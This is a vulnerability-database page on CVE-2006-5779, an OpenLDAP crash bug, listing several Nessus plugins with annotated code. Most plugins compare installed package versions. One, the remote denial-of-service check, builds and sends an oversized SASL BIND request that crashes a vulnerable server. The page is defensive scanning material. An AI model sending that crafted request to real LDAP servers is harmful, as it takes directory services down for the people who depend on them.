Vulnerabilities > CVE-2006-5779 - Reachable Assertion vulnerability in multiple products

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
HIGH
network
low complexity
openldap
canonical
CWE-617
nessus

Summary

OpenLDAP before 2.3.29 allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.

Common Weakness Enumeration (CWE)

Nessus

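  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_SA_2006_072.NASL
    description: The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client). OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash.
    last seen: 2019-10-28
    modified: 2007-02-18
    plugin id: 24449
    published: 2007-02-18
    reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/24449
    title: SUSE-SA:2006:072: openldap2-client
    code: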
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:072
    #
    
    
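    # Engine capability gate: stop silently when the bn_random() built-in is
    # missing (presumably a proxy for a minimum scanner version -- confirm).
    if ( ! defined_func("bn_random") ) exit(0);
    
    include("compat.inc");
    
    # Registration phase: declare the plugin's metadata and exit. No host data
    # is read in this branch.
    if(description)
    {
     script_id(24449);
     script_version ("1.9");
    
     # The description text below names CVE-2006-5779, but the plugin never
     # registered the identifier, so CVE-keyed searches and reports would not
     # list this check. Register it explicitly.
     script_cve_id("CVE-2006-5779");
     
     name["english"] = "SUSE-SA:2006:072: openldap2-client";
     
     script_name(english:name["english"]);
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote host is missing a vendor-supplied security patch" );
     script_set_attribute(attribute:"description", value:
    "The remote host is missing the patch for the advisory SUSE-SA:2006:072 (openldap2-client).
    
    
    OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to  cause an affected application (especially the
    OpenLDAP Server) to crash.
    
    This is tracked by the Mitre CVE ID CVE-2006-5779." );
     script_set_attribute(attribute:"solution", value:
    "http://www.novell.com/linux/security/advisories/2006_72_openldap2.html" );
     script_set_attribute(attribute:"risk_factor", value:"High" );
    
    
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/18");
     script_end_attributes();
    
     
     summary["english"] = "Check for the version of the openldap2-client package";
     script_summary(english:summary["english"]);
     
     # Information-gathering category: the verdict is derived from the package
     # inventory, not from traffic sent to the LDAP service.
     script_category(ACT_GATHER_INFO);
     
     script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
     family["english"] = "SuSE Local Security Checks";
     script_family(english:family["english"]);
     
     # The RPM inventory must already be in the knowledge base; it is presumably
     # collected by ssh_get_info.nasl over an authenticated session.
     script_dependencies("ssh_get_info.nasl");
     script_require_keys("Host/SuSE/rpm-list");
     exit(0);
    }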
    
    include("rpm.inc");
    # Compare the installed openldap2-client against the fixed build for each
    # supported release and report on the first hit. rpm_check() comes from
    # rpm.inc (not shown); it is presumed to return true when the installed
    # package is older than the reference -- confirm against the library.
    # Evaluation stops at the first match, as in the two separate tests this
    # replaces.
    if (
      rpm_check( reference:"openldap2-client-2.2.27-6.4", release:"SUSE10.0") ||
      rpm_check( reference:"openldap2-client-2.2.23-6.6", release:"SUSE9.3")
    )
    {
     security_hole(0);
     exit(0);
    }
    
  • NASL family: Ubuntu Local Security Checks
    NASL id: UBUNTU_USN-384-1.NASL
    description: Evgeny Legerov discovered that the OpenLDAP libraries did not correctly truncate authcid names. This situation would trigger an assert and abort the program using the libraries. A remote attacker could send specially crafted bind requests that would lead to an LDAP server denial of service. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 27967
    published: 2007-11-10
    reporter: Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/27967
    title: Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Ubuntu Security Notice USN-384-1. The text 
    # itself is copyright (C) Canonical, Inc. See 
    # <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered 
    # trademark of Canonical, Inc.
    #
    
    include("compat.inc");
    
    # Registration phase: when the engine evaluates the plugin with
    # `description` set, only metadata is declared and the script exits before
    # any knowledge-base item is read.
    if (description)
    {
      script_id(27967);
      script_version("1.15");
      script_cvs_date("Date: 2019/08/02 13:33:01");
    
      # Cross-references used to correlate this finding with other sources.
      script_cve_id("CVE-2006-5779");
      script_bugtraq_id(20939);
      script_xref(name:"USN", value:"384-1");
    
      script_name(english:"Ubuntu 5.10 / 6.06 LTS / 6.10 : openldap2.2 vulnerability (USN-384-1)");
      script_summary(english:"Checks dpkg output for updated packages.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Ubuntu host is missing one or more security-related
    patches."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Evgeny Legerov discovered that the OpenLDAP libraries did not
    correctly truncate authcid names. This situation would trigger an
    assert and abort the program using the libraries. A remote attacker
    could send specially crafted bind requests that would lead to an LDAP
    server denial of service.
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Ubuntu security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://usn.ubuntu.com/384-1/"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected ldap-utils, libldap-2.2-7 and / or slapd packages."
      );
      # CVSS v2 base vector: reachable over the network, low complexity, no
      # authentication, availability impact only (partial).
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      # "local": the result comes from the host's package inventory, so it
      # needs a credentialed scan and says nothing about whether slapd is
      # actually listening.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:ldap-utils");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:libldap-2.2-7");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:canonical:ubuntu_linux:slapd");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:5.10");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.06:-:lts");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:canonical:ubuntu_linux:6.10");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/10");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Ubuntu Local Security Checks");
    
      # Knowledge-base keys that must exist before the check body runs; they are
      # presumably populated by ssh_get_info.nasl -- confirm.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/cpu", "Host/Ubuntu", "Host/Ubuntu/release", "Host/Debian/dpkg-l");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("ubuntu.inc");
    include("misc_func.inc");
    
    # Preconditions: every failed test ends the script through audit() with a
    # reason code, so a host that is out of scope is not silently treated as
    # patched.
    if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/Ubuntu/release");
    if ( isnull(release) ) audit(AUDIT_OS_NOT, "Ubuntu");
    release = chomp(release);
    # Anchored match: only the three releases covered by USN-384-1 are accepted.
    if (! ereg(pattern:"^(5\.10|6\.06|6\.10)$", string:release)) audit(AUDIT_OS_NOT, "Ubuntu 5.10 / 6.06 / 6.10", "Ubuntu " + release);
    if ( ! get_kb_item("Host/Debian/dpkg-l") ) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    # Only x86_64 and i386-i686 inventories are evaluated; any other
    # architecture is audited out as "not implemented" rather than reported.
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Ubuntu", cpu);
    
    # Count every package that is still below the fixed build for its release.
    # The fixed builds are distribution backports (2.2.26-...), so the test is
    # made against package versions, not against the upstream release number.
    # ubuntu_check() comes from ubuntu.inc (not shown).
    flag = 0;
    
    # Ubuntu 5.10
    if (ubuntu_check(osver:"5.10", pkgname:"ldap-utils", pkgver:"2.2.26-3ubuntu0.2")) flag++;
    if (ubuntu_check(osver:"5.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-3ubuntu0.2")) flag++;
    if (ubuntu_check(osver:"5.10", pkgname:"slapd", pkgver:"2.2.26-3ubuntu0.2")) flag++;
    # Ubuntu 6.06 LTS
    if (ubuntu_check(osver:"6.06", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu2.2")) flag++;
    if (ubuntu_check(osver:"6.06", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu2.2")) flag++;
    if (ubuntu_check(osver:"6.06", pkgname:"slapd", pkgver:"2.2.26-5ubuntu2.2")) flag++;
    # Ubuntu 6.10
    if (ubuntu_check(osver:"6.10", pkgname:"ldap-utils", pkgver:"2.2.26-5ubuntu3.1")) flag++;
    if (ubuntu_check(osver:"6.10", pkgname:"libldap-2.2-7", pkgver:"2.2.26-5ubuntu3.1")) flag++;
    if (ubuntu_check(osver:"6.10", pkgname:"slapd", pkgver:"2.2.26-5ubuntu3.1")) flag++;
    
    # At least one outdated package: report on port 0 (host-level finding) with
    # the package details collected by the library, then stop.
    if (flag)
    {
      security_report_v4(port:0, severity:SECURITY_WARNING, extra:ubuntu_report_get());
      exit(0);
    }
    
    # Reached only when nothing was flagged, because the branch above exits.
    # Distinguish "installed and patched" from "not installed at all".
    tested = ubuntu_pkg_tests_get();
    if (tested)
      audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else
      audit(AUDIT_PACKAGE_NOT_INSTALLED, "ldap-utils / libldap-2.2-7 / slapd");
    
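  • NASL family: SuSE Local Security Checks
    NASL id: SUSE_OPENLDAP2-CLIENT-2282.NASL
    description: OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash (CVE-2006-5779).
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 27364
    published: 2007-10-17
    reporter: This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/27364
    title: openSUSE 10 Security Update : openldap2-client (openldap2-client-2282)
    code: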
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update openldap2-client-2282.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    # Registration phase: declare metadata for the openSUSE 10.1 package check
    # and exit; the check body below is not reached in this mode.
    if (description)
    {
      script_id(27364);
      script_version ("1.12");
      script_cvs_date("Date: 2019/10/25 13:36:28");
    
      script_cve_id("CVE-2006-5779");
    
      script_name(english:"openSUSE 10 Security Update : openldap2-client (openldap2-client-2282)");
      script_summary(english:"Check for the openldap2-client-2282 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to cause an affected application (especially the
    OpenLDAP Server) to crash (CVE-2006-5779)."
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected openldap2-client packages."
      );
      # CVSS v2 base vector: network-reachable, no authentication, availability
      # impact only (partial).
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      # "local": decided from the RPM inventory of a credentialed scan.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openldap2-client-32bit");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:10.1");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/17");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/17");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      # Knowledge-base keys the check body depends on; presumably filled in by
      # ssh_get_info.nasl -- confirm.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    # Preconditions: each failed test ends the script through audit() with a
    # reason code instead of letting an out-of-scope host look patched.
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    # Enterprise releases (SLED/SLES prefixes) are excluded; this plugin only
    # evaluates openSUSE.
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    # Anchored match: only the release string SUSE10.1 is accepted.
    if (release !~ "^(SUSE10\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "10.1", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    # Exact architecture match; anything else is audited out, not reported.
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    # Count installed packages that are below the fixed build. rpm_check()
    # comes from rpm.inc (not shown). The 32-bit compatibility package is only
    # evaluated on x86_64.
    flag = 0;
    
    if ( rpm_check(release:"SUSE10.1", reference:"openldap2-client-2.3.19-18.11") ) flag++;
    if ( rpm_check(release:"SUSE10.1", cpu:"x86_64", reference:"openldap2-client-32bit-2.3.19-18.11") ) flag++;
    
    # Outdated package found: report at host level (port 0); the package detail
    # is attached only when report verbosity is above zero.
    if (flag)
    {
      if (report_verbosity > 0)
        security_warning(port:0, extra:rpm_report_get());
      else
        security_warning(0);
      exit(0);
    }
    
    # Reached only when nothing was flagged, because the branch above exits.
    # Distinguish "installed and patched" from "not installed at all".
    tested = pkg_tests_get();
    if (tested)
      audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else
      audit(AUDIT_PACKAGE_NOT_INSTALLED, "openldap2-client / openldap2-client-32bit");
    
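  • NASL family: SuSE Local Security Checks
    NASL id: SUSE9_11307.NASL
    description: OpenLDAP libldap's strval2strlen() function contained a bug when processing the authcid string of certain Bind Requests, which could allow attackers to cause an affected application (especially the OpenLDAP Server) to crash. (CVE-2006-5779)
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 41106
    published: 2009-09-24
    reporter: This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/41106
    title: SuSE9 Security Update : openldap2-client (YOU Patch Number 11307)
    code: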
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The text description of this plugin is (C) Novell, Inc.
    #
    
    include("compat.inc");
    
    # Registration phase: declare metadata for the SuSE 9 package check and
    # exit; the check body below is not reached in this mode.
    if (description)
    {
      script_id(41106);
      script_version("1.6");
      script_cvs_date("Date: 2019/10/25 13:36:28");
    
      script_cve_id("CVE-2006-5779");
    
      script_name(english:"SuSE9 Security Update : openldap2-client (YOU Patch Number 11307)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote SuSE 9 host is missing a security-related patch."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "OpenLDAP libldap's strval2strlen() function contained a bug when
    processing the authcid string of certain Bind Requests, which could
    allow attackers to cause an affected application (especially the
    OpenLDAP Server) to crash. (CVE-2006-5779)"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://support.novell.com/security/cve/CVE-2006-5779.html"
      );
      script_set_attribute(attribute:"solution", value:"Apply YOU patch number 11307.");
      # CVSS v2 base vector: network-reachable, no authentication, availability
      # impact only (partial).
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
    
      # "local": decided from the RPM inventory of a credentialed scan.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:suse:suse_linux");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/22");
      script_set_attribute(attribute:"plugin_publication_date", value:"2009/09/24");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      # Knowledge-base keys the check body depends on; presumably filled in by
      # ssh_get_info.nasl -- confirm.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("rpm.inc");
    
    
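    # Preconditions: stop with an explanatory message when the host is out of
    # scope (exit code 0) or when required inventory data is missing (exit
    # code 1), so that neither case is mistaken for a patched host.
    if (!get_kb_item("Host/local_checks_enabled")) exit(0, "Local checks are not enabled.");
    if (!get_kb_item("Host/SuSE/release")) exit(0, "The host is not running SuSE.");
    if (!get_kb_item("Host/SuSE/rpm-list")) exit(1, "Could not obtain the list of installed packages.");
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) exit(1, "Failed to determine the architecture type.");
    # The substring test must ask whether "x86_64" occurs in cpu. The operands
    # were previously reversed (cpu >!< "x86_64"), which let any fragment of
    # the literal, such as "x86", pass the architecture gate.
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") exit(1, "Local checks for SuSE 9 on the '"+cpu+"' architecture have not been implemented.");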
    
    
    # Count installed packages that are below the fixed build. rpm_check()
    # comes from rpm.inc (not shown). The 32-bit compatibility package is only
    # evaluated on x86_64.
    flag = 0;
    if (rpm_check(release:"SUSE9", reference:"openldap2-client-2.2.24-4.22")) flag++;
    if (rpm_check(release:"SUSE9", cpu:"x86_64", reference:"openldap2-client-32bit-9-200611171828")) flag++;
    
    # Nothing outdated: finish with the informational message.
    if (!flag) exit(0, "The host is not affected.");
    
    # Outdated package found: report at host level (port 0); the package detail
    # is attached only when report verbosity is above zero.
    if (report_verbosity > 0)
      security_warning(port:0, extra:rpm_report_get());
    else
      security_warning(0);
    exit(0);
    
  • NASL family: Denial of Service
    NASL id: OPENLDAP_SASL_BIND_DOS.NASL
    description: The remote host appears to be running OpenLDAP, an open source LDAP directory implementation. The version of OpenLDAP installed on the remote host fails to handle malformed SASL bind requests. An unauthenticated attacker can leverage this issue to crash the LDAP server on the affected host.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 23625
    published: 2006-11-07
    reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/23625
    title: OpenLDAP SASL authcid Name BIND Request DoS
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    include("compat.inc");
    
    # Registration phase: declare metadata for the remote check and exit. Unlike
    # the package-based plugins for this CVE, this one is typed "remote" and
    # placed in the ACT_DENIAL category (see below).
    if (description) {
      script_id(23625);
      script_version("1.19");
    
      script_cve_id("CVE-2006-5779");
      script_bugtraq_id(20939);
    
      script_name(english:"OpenLDAP SASL authcid Name BIND Request DoS");
      script_summary(english:"Tries to crash OpenLDAP");
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote LDAP server is prone to a denial of service attack." );
     script_set_attribute(attribute:"description", value:
    "The remote host appears to be running OpenLDAP, an open source LDAP
    directory implementation. 
    
    The version of OpenLDAP installed on the remote host fails to handle
    malformed SASL bind requests.  An unauthenticated attacker can
    leverage this issue to crash the LDAP server on the affected host." );
     script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/450728/30/0/threaded" );
      # http://www.openldap.org/its/index.cgi/Archive.Software%20Bugs?id=4740;expression=authcid%20Name%20BIND%20Request;selectid=4740;usearchives=1
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9daf484d" );
     script_set_attribute(attribute:"see_also", value:"http://www.openldap.org/software/release/changes.html" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to OpenLDAP 2.3.29 or later." );
      # CVSS v2 base vector: network-reachable, no authentication, availability
      # impact only (partial).
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/07");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/06");
     script_cvs_date("Date: 2018/11/15 20:50:21");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe",value:"cpe:/a:openldap:openldap");
    script_end_attributes();
    
     
      # ACT_DENIAL: a positive result means the directory service was taken
      # down by the check itself. Scan policies normally leave this category
      # out when safe checks are enabled; plan a maintenance window and a
      # service restart before enabling it against production directories.
      script_category(ACT_DENIAL);
      script_family(english:"Denial of Service");
      script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
      # Runs only against ports that ldap_detect.nasl identified as LDAP, with
      # 389 as the fallback.
      script_dependencies("ldap_detect.nasl");
      script_require_ports("Services/ldap", 389);
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("byte_func.inc");
    include("misc_func.inc");
    
    
    # Step 1 of the remote check: confirm that the peer answers LDAP bind
    # requests before the intrusive step is attempted.
    # The port is taken from service detection and falls back to 389; with
    # exit_on_fail set the script presumably stops when no LDAP service is
    # known -- confirm against the library.
    port = get_service(svc:"ldap", default: 389, exit_on_fail: 1);
    
    
    soc = open_sock_tcp(port);
    # No connection means nothing can be concluded; exit without a report.
    if (!soc) exit(0);
    
    
    # Message id used to match the reply to this request.
    id = rand() % 1024;
    
    set_byte_order(BYTE_ORDER_BIG_ENDIAN);
    # A short, well-formed SASL bind request naming the CRAM-MD5 mechanism.
    req_bind1 =
      mkbyte(0x30) +                       # universal sequence
      mkbyte(0x17) +                       # length of the request
      mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random)
      mkbyte(0x60) +                       # bind request
        mkbyte(0x11) +                     #   length of request
        mkbyte(2) +                        #   version (3)
          mkbyte(1) + mkbyte(3) +
        mkbyte(4) +                        #   authentication (SASL)
          mkbyte(0) +
          mkbyte(0xa3) +
          mkbyte(10) +
          mkbyte(4) + mkbyte(8) + "CRAM-MD5";
    send(socket:soc, data:req_bind1);
    res = recv(socket:soc, length:1024);
    
    # Step 2 of the remote check: only when the first reply looks like a bind
    # response to our message id is the oversized bind request sent, and the
    # host is reported only if the service then stops answering.
    # NOTE(review): the socket is closed only inside this branch; when the
    # first reply does not match, the script ends with `soc` still open.
    # NOTE(review): there is no negative result. A server that answers the
    # second request, or is reachable again after the pause, produces no
    # output, so "no finding" does not prove the host is patched.
    # If...
    if (
      # the response is long enough and..
      strlen(res) > 5 &&
      # it looks like an LDAP message and...
      getbyte(blob:res, pos:0) == 0x30 &&
      # it's a response to our request.
      (mkword(id) + mkbyte(0x61)) >< res
    )
    {
      # Try to kill the server.
      # The message id is the previous id minus one, not a fresh random value
      # as the field comment below says.
      id = id - 1;
      req_bind2 =
        mkbyte(0x30) +                     # universal sequence
        mkbyte(0x82) + mkword(0x041f) +    # length of the request
        mkbyte(2) + mkbyte(2) + mkword(id) + # message id (random)
        mkbyte(0x60) +                     # bind request
          mkbyte(0x82) + mkword(0x0417) +  #   length of request
          mkbyte(2) +                      #  version (3)
            mkbyte(1) + mkbyte(3) + 
          mkbyte(4) +                        #   authentication (SASL)
          mkbyte(0) +
          mkbyte(0xa3) +
            mkbyte(0x82) + mkword(0x040e) + 
          mkbyte(4) + mkbyte(8) + "CRAM-MD5" + 
          mkbyte(4) + mkbyte(0x82) + mkword(0x0400) + crap(data:" ", length:1024);
      send(socket:soc, data:req_bind2);
      res = recv(socket:soc, length:1024);
      close(soc);
    
      # If we didn't get a response, try to open another connection.
      # An empty reply alone is not treated as proof; the port has to look dead
      # after a one-second pause. A daemon that a supervisor restarts within
      # that pause would presumably be seen as alive (possible false negative).
      if (strlen(res) == 0)
      {
        sleep(1);
        if (service_is_dead(port: port) > 0)
        {
          security_warning(port);
          exit(0);
        }
      }
    }
    
  • NASL family: Mandriva Local Security Checks
    NASL id: MANDRAKE_MDKSA-2006-208.NASL
    description: An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 24593
    published: 2007-02-18
    reporter: This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/24593
    title: Mandrake Linux Security Advisory : openldap (MDKSA-2006:208)
    code:
    #%NASL_MIN_LEVEL 80502
    
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Mandrake Linux Security Advisory MDKSA-2006:208. 
    # The text itself is copyright (C) Mandriva S.A.
    #
    
    include("compat.inc");
    
    # Registration phase: declare metadata for the Mandrake/Mandriva package
    # check and exit; the check body below is not reached in this mode.
    if (description)
    {
      script_id(24593);
      script_version ("1.17");
      script_cvs_date("Date: 2019/08/02 13:32:48");
    
      # Cross-references used to correlate this finding with other sources.
      script_cve_id("CVE-2006-5779");
      script_bugtraq_id(20939);
      script_xref(name:"MDKSA", value:"2006:208");
    
      script_name(english:"Mandrake Linux Security Advisory : openldap (MDKSA-2006:208)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote Mandrake Linux host is missing one or more security
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An unspecified vulnerability in OpenLDAP allows remote attackers to
    cause a denial of service (daemon crash) via a certain combination of
    SASL Bind requests that triggers an assertion failure in libldap.
    
    Packages have been patched to correct this issue."
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      # CVSS v2 base vector: network-reachable, no authentication, availability
      # impact only (partial).
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      # "local": decided from the RPM inventory of a credentialed scan.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64ldap2.3_0-static-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libldap2.3_0-static-devel");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-clients");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:openldap-servers");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2007");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2006/11/14");
      script_set_attribute(attribute:"plugin_publication_date", value:"2007/02/18");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Mandriva Local Security Checks");
    
      # Knowledge-base keys the check body depends on; presumably filled in by
      # ssh_get_info.nasl -- confirm.
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
    
